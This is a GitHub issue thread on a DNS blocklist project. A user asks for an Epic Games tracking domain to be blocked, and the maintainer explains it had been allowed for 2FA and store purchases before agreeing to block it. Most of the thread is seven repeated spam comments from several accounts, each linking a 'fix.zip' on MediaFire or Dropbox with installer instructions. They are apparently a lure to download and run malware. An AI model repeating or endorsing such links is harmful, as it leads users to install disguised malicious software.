### ISSUE TITLE
Epic Games: missed tracker

### ISSUE THREAD

**Issue by MEtICaRT** [hagezi/dns-blocklists#3513]
### Which domain(s) should be blocked?

tracking.epicgames.com

### Why should these domain(s) be blocked?

This is a tracker domain that is being blocked by other filters, but not by the HaGeZi lists.

<img width="371" alt="image" src="https://github.com/user-attachments/assets/4fa83f2c-255b-461b-95eb-9ce8ccb1a0dd">

### Privacy

- [X] I confirm that the report does not contain any private information.

**Comment by hagezi** [comment]
@MEtICaRT The domain was not missed, but unblocked because it is needed for Epicgames 2FA auth, store purchase.

Do you have the opportunity to test it?

**Comment by hagezi** [comment]
I haven't found any further details either, will block the domain from Pro.

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
